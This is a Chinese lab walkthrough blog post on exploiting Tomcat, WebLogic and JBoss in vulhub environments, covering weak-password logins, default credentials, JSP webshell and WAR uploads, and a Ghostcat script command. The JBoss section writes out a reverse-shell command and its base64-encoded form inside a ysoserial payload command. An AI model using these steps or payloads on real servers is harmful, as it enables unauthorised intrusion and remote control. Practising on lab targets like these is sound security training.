一些常见的中间件漏洞

Tomcat 之CVE-2017-12615

靶场搭建使用vulhub-master/tomcat/CVE-2017-12615

第一步、访问网站

第二步、首页抓包改为put方式提交

网上找一个jsp的一句话木马

使用webshell工具链接即可

Tomcat 之tomcat8

vulhub-master/tomcat/tomcat8

继续访问页面

这次我们点击登录,弱口令tomcat

在页面最下方有一个上传war包的程序

制作WAR包,将JSP木马压缩为ZIP格式,然后修改后缀为war就可以了

上传之后打开

2.文件上传成功后,默认会在网站根目录下生成和war包名称一致得目录,然后目录中得木马就是压缩前得 文件名。

使用哥斯拉生成木马并连接即可

Tomcat 之CVE-2020-1938

搭建环境

vulhub-master/tomcat/CVE-2020-1938

tomcat默认的conf/server.xml中配置了2个Connector,一个为 8080 的对外提供的HTTP协议端口:
另外一个就是默认的 8009 AJP协议端口,两个端口默认均监听在外网ip。

python CVE-2020-1938.py -p 8009 -f /WEB-INF/web.xml ip

使用py脚本连接即可,脚本自行下载

weblogic之弱口令

vulhub-master/weblogic/weak_password

默认账号密码:weblogic/Oracle@123

weblogic常用弱口令:https://cirt.net/passwords?criteria=weblogic

这里注意,单个账号错误密码5次之后就会自动锁定:

访问ip+console

可直接跳转此页面,弱口令登录

登录后台后,点击部署,点击安装,点击上传文件。

上传war包,jsp木马压缩成zip,修改后缀为war,上传

访问部署好的war

http://ip/zxcvbnm/zxcvbnm.jsp

getshell连接

weblogic之CVE-2017-3506

此项目使用与上一个项目一样的环境

验证是否存在wls-wsat组件

http://ip/wls-wsat/CoordinatorPortType

在当前页面抓包之后,添加下面请求包,在标签之间分别写存放jsp 的路径和要写入的 shell

然后访问url

http://ip/bea_wls internal/shell.jsp

也可写入反弹shell 如上图

weblogic之CVE-2019-2725

vulhub-master/weblogic/weak_password

漏洞验证_async/AsyncResponseService

抓包,写入shell

软件连接

weblogic之CVE-2018-2628

vulhub-master/weblogic/CVE-2018-2628

Jboss

        JBoss是⼀个基于J2EE的开发源代码的应⽤服务器。JBoss代码遵循LGPL许可,可以在任何商业应⽤中 免费使⽤。JBoss是⼀个管理EJB的容器和服务器,⽀持EJB1.1、EJB 2.0和EJB3的规范。但JBoss核⼼ 服务不包括⽀持servlet/JSP的WEB容器,⼀般与Tomcat或Jetty绑定使⽤。在J2EE应⽤服务器领域, JBoss是发展最为迅速应⽤服务器。由于JBoss遵循商业友好的LGPL授权分发,并且由开源社区开发, 这使得JBoss⼴为流⾏。

Jboss之CVE-2015-7501

        这是经典的JBoss反序列化漏洞,JBoss在/invoker/JMXInvokerServlet请求中读取了⽤户传⼊的对象, 然后我们利⽤Apache Commons Collections中的 Gadget 执⾏任意代码

        环境搭建cd vulhub-master/jboss/JMXInvokerServlet-deserialization

访问靶场

搜索http://1.92.134.1:8080/invoker/JMXInvokerServlet 返回如下页面说明存在漏洞

下载工具进行利用https://github.com/frohoff/ysoserial

bash -i >& /dev/tcp/1.92.134.1/4444 0>&1
YmFzaCAtaSA+JiAvZGV2L3RjcC8xLjkyLjEzNC4xLzQ0NDQgMD4mMQ==
java8 -jar ysoserial-all.jar CommonsCollections5 "bash -c{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xLjkyLjEzNC4xLzQ0NDQgMD4mMQ==}|{base64,-d}|{bash,-i}">exp.ser

  • 4
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值